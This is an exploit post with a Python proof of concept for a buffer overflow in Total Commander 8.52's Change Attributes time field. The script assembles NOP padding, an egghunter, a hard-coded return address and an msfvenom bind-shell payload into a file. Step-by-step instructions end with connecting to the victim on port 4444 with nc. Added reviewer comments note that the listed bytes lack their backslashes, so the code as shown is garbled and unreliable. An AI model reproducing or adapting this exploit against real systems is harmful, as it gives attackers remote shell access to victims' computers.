Total Commander 8.52 Buffer Overflow
Posted on 22 September 2015
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
#
# Reviewer notes (structure of this proof-of-concept, for defenders):
# - The script does no network I/O itself: it only assembles a string
#   (NOP padding, an egghunter stub, a fixed return address, an egg tag
#   and an msfvenom-generated payload) and writes it to time.txt.  The
#   overflow is triggered only when that text is pasted into the
#   Change Attributes "time" field by hand, as the steps above describe.
# - NOTE(review): as rendered on this page the escape sequences appear
#   without their backslashes (e.g. "x90"), so every literal below is
#   plain ASCII text rather than the byte values the author intended;
#   the offsets quoted in the author's comments (265, the JMP EAX
#   address) refer to the original byte encoding, not to this listing.
# - The control-flow address below is hard-coded for the author's
#   test platform (Windows XP SP2, see "Tested On"); fixed absolute
#   addresses of this kind are generally defeated by ASLR on later
#   Windows releases, so this PoC is platform-specific.  The root
#   cause is a missing length check on the dialog's time field, which
#   is where a fix belongs.

# `file` shadows the Python 2 builtin of the same name; the handle is
# closed explicitly at the end rather than with a `with` block.
file = open('time.txt' , 'w');

# Leading padding.  NOTE(review): with the un-escaped 3-character
# literal this is 570 characters, so the `265 - len(buffer)` padding
# further down evaluates to a negative repeat count and adds nothing.
buffer = "x90"*190

# Egghunter stub: scans memory for the doubled "R0cX" tag that is
# placed immediately before the payload below.
buffer += "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x52x30x63x58x8bxfaxafx75xeaxafx75xe7xffxe7" # Egghunter looking for R0cX R0cX

# Pad up to the author's stated offset (265) where the saved return
# address is overwritten.
buffer += "x90"*(265- len(buffer))

# Overwritten return address, little-endian; the author's comment
# records it as a JMP EAX gadget at 0x75F74747 (XP SP2 only).
buffer += "x47x47xf7x75" #75F74747 FFE0 JMP EAX

# Payload constraints as stated by the author: bytes 0x00, 0x0a and
# 0x0d must not appear, hence the encoded msfvenom output below.
# bad characters - x00x0ax0d
# msfvenom -p windows/shell_bind_tcp -f c -b 'x00x0ax0d'

# Egg tag (written twice, as the egghunter above expects) followed by
# the encoded bind-shell payload.  Adjacent string literals inside the
# parentheses are concatenated by the parser.
buffer += "R0cX" + "R0cX" + (
    "xbfx46xebxb1xe7xdaxc5xd9x74x24xf4x5dx29xc9xb1"
    "x53x31x7dx12x83xc5x04x03x3bxe5x53x12x3fx11x11"
    "xddxbfxe2x76x57x5axd3xb6x03x2fx44x07x47x7dx69"
    "xecx05x95xfax80x81x9ax4bx2exf4x95x4cx03xc4xb4"
    "xcex5ex19x16xeex90x6cx57x37xccx9dx05xe0x9ax30"
    "xb9x85xd7x88x32xd5xf6x88xa7xaexf9xb9x76xa4xa3"
    "x19x79x69xd8x13x61x6exe5xeax1ax44x91xecxcax94"
    "x5ax42x33x19xa9x9ax74x9ex52xe9x8cxdcxefxeax4b"
    "x9ex2bx7ex4fx38xbfxd8xabxb8x6cxbex38xb6xd9xb4"
    "x66xdbxdcx19x1dxe7x55x9cxf1x61x2dxbbxd5x2axf5"
    "xa2x4cx97x58xdax8ex78x04x7exc5x95x51xf3x84xf1"
    "x96x3ex36x02xb1x49x45x30x1exe2xc1x78xd7x2cx16"
    "x7exc2x89x88x81xedxe9x81x45xb9xb9xb9x6cxc2x51"
    "x39x90x17xcfx31x37xc8xf2xbcx87xb8xb2x6ex60xd3"
    "x3cx51x90xdcx96xfax39x21x19x15xe6xacxffx7fx06"
    "xf9xa8x17xe4xdex60x80x17x35xd9x26x5fx5fxdex49"
    "x60x75x48xddxebx9ax4cxfcxebxb6xe4x69x7bx4cx65"
    "xd8x1dx51xacx8axbexc0x2bx4axc8xf8xe3x1dx9dxcf"
    "xfdxcbx33x69x54xe9xc9xefx9fxa9x15xccx1ex30xdb"
    "x68x05x22x25x70x01x16xf9x27xdfxc0xbfx91x91xba"
    "x69x4dx78x2axefxbdxbbx2cxf0xebx4dxd0x41x42x08"
    "xefx6ex02x9cx88x92xb2x63x43x17xc2x29xc9x3ex4b"
    "xf4x98x02x16x07x77x40x2fx84x7dx39xd4x94xf4x3c"
    "x90x12xe5x4cx89xf6x09xe2xaaxd2"
)

# Write the assembled string to time.txt in text mode and close the handle.
file.write(buffer)
file.close()